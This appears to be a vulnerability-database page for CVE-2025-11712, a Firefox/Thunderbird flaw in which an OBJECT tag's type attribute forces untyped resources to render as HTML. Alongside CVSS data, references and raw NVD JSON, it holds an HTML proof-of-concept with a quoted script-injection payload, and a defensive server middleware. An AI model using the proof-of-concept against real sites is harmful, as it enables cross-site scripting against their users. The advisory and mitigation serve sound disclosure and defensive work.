Security Vulnerability Report
CVE-2025-11712 CVSS 6.1 MEDIUM

CVE-2025-11712

Published: 2025-10-14 13:15:37
Last Modified: 2026-04-13 15:16:40

Description

A malicious page could have used the type attribute of an OBJECT tag to override the default browser behavior when encountering a web resource served without a content-type. This could have contributed to an XSS on a site that unsafely serves files without a content-type header. This vulnerability was fixed in Firefox 144, Firefox ESR 140.4, Thunderbird 144, and Thunderbird 140.4.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:* - VULNERABLE
Mozilla Firefox < 144
Mozilla Firefox ESR < 140.4
Mozilla Thunderbird < 144
Mozilla Thunderbird < 140.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-11712 PoC: OBJECT tag type attribute XSS -->
<!-- This PoC demonstrates how the type attribute of an OBJECT tag can be abused -->
<!-- to override browser default behavior when a resource is served without Content-Type -->
<!DOCTYPE html>
<html>
<head>
  <title>CVE-2025-11712 PoC</title>
</head>
<body>
  <h1>CVE-2025-11712 - OBJECT Tag XSS via Type Attribute Override</h1>

  <!--
    The malicious OBJECT tag uses the type attribute to force the browser
    to interpret the loaded resource as HTML, even when the target server
    does not provide a Content-Type header.
    The target URL should point to a resource on a vulnerable site that is
    served without a proper Content-Type response header.
  -->
  <object type="text/html" data="https://vulnerable-site.example.com/unsafe-file" width="600" height="400">
    <!-- Fallback content -->
    <p>If you see this, the OBJECT failed to load.</p>
  </object>

  <!--
    Alternative PoC using data attribute with a crafted payload:
    If the vulnerable site serves user-controlled content without Content-Type,
    the attacker can inject HTML/JavaScript through the OBJECT's type override.
  -->
  <object type="text/html" data="https://vulnerable-site.example.com/user-content/reflected-input">
  </object>

  <!--
    Demonstration of how the type override enables XSS:
    When the browser fetches the resource specified in 'data', it normally
    relies on the Content-Type header. However, the 'type' attribute in the
    OBJECT tag takes precedence, forcing the browser to render the response
    as HTML regardless of the actual content type.
    If an attacker can control part of the content at the target URL,
    they can inject: <script>alert('XSS via CVE-2025-11712')</script>
  -->

  <script>
    // Note: The actual exploitation requires the target site to serve
    // content without Content-Type header, and some portion of that
    // content must be controllable by the attacker.
    console.log("CVE-2025-11712 PoC loaded");
  </script>
</body>
</html>
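On the server side, the precondition named in the description is a response that leaves the site without a Content-Type header. The following is an added example, not code from the advisory or from Mozilla: a WSGI middleware that gives such responses a non-rendering default type and records which paths needed it. The default type, `demo_app`, `fetch` and the `/unsafe-file` path are assumptions made for illustration.

```python
# Added example (not from the advisory): WSGI middleware that guarantees a
# Content-Type on every response that can carry a body.
SAFE_DEFAULT = "application/octet-stream"  # assumption: untyped files must not render
NO_BODY = {"204", "304"}                   # statuses without a body are left alone


class EnforceContentType:
    def __init__(self, app, default=SAFE_DEFAULT):
        self.app = app
        self.default = default
        self.untyped_paths = []  # paths the wrapped app served without a type

    def __call__(self, environ, start_response):
        def checked_start(status, headers, exc_info=None):
            code = status.split(" ", 1)[0]
            declared = [v for k, v in headers if k.lower() == "content-type"]
            missing = not any(v.strip() for v in declared)  # absent or empty
            if missing and code not in NO_BODY and not code.startswith("1"):
                headers = [(k, v) for k, v in headers if k.lower() != "content-type"]
                headers.append(("Content-Type", self.default))
                self.untyped_paths.append(environ.get("PATH_INFO", ""))
            if exc_info is not None:
                return start_response(status, headers, exc_info)
            return start_response(status, headers)
        return self.app(environ, checked_start)


def demo_app(environ, start_response):
    """Constructed sample app: /unsafe-file is served with no Content-Type."""
    if environ.get("PATH_INFO") == "/unsafe-file":
        body = b"<b>user-controlled bytes</b>"
        start_response("200 OK", [("Content-Length", str(len(body)))])
        return [body]
    start_response("200 OK", [("Content-Type", "text/plain; charset=utf-8")])
    return [b"ok"]


def fetch(app, path):
    """Run one in-process GET and return (status, lower-cased headers, body)."""
    seen = {}

    def start_response(status, headers, exc_info=None):
        seen["status"] = status
        seen["headers"] = {k.lower(): v for k, v in headers}
    body = b"".join(app({"REQUEST_METHOD": "GET", "PATH_INFO": path}, start_response))
    return seen["status"], seen["headers"], body
```

Wrapping an application as `EnforceContentType(app)` and reviewing `untyped_paths` after a crawl or test run shows which handlers need an explicit type set at the source.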

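References

- https://bugzilla.mozilla.org/show_bug.cgi?id=1979536 (Issue Tracking, Permissions Required)
- https://www.mozilla.org/security/advisories/mfsa2025-81/ (Vendor Advisory)
- https://www.mozilla.org/security/advisories/mfsa2025-83/ (Vendor Advisory)
- https://www.mozilla.org/security/advisories/mfsa2025-84/ (Vendor Advisory)
- https://www.mozilla.org/security/advisories/mfsa2025-85/ (Vendor Advisory)
- https://lists.debian.org/debian-lts-announce/2025/10/msg00015.html
- https://lists.debian.org/debian-lts-announce/2025/10/msg00031.html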

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11712", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:37.447", "lastModified": "2026-04-13T15:16:39.987", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A malicious page could have used the type attribute of an OBJECT tag to override the default browser behavior when encountering a web resource served without a content-type. This could have contributed to an XSS on a site that unsafely serves files without a content-type header. This vulnerability was fixed in Firefox 144, Firefox ESR 140.4, Thunderbird 144, and Thunderbird 140.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-116"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.4.0", "matchCriteriaId": "563626A1-A62C-4F33-A40F-31AC364254E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "144.0", "matchCriteriaId": "CEE2F6DA-4331-4D6D-B01B-610DFDBE1833"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionEndExcluding": "140.4.0", "matchCriteriaId": "7C6D96D2-1E0E-4A18-B8B1-21F67E1AB441"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionStartIncluding": 
"141.0", "versionEndExcluding": "144.0", "matchCriteriaId": "0BD75942-93B9-47A4-9762-05965EBD7FFF"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1979536", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-81/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-83/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-84/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-85/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00015.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00031.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}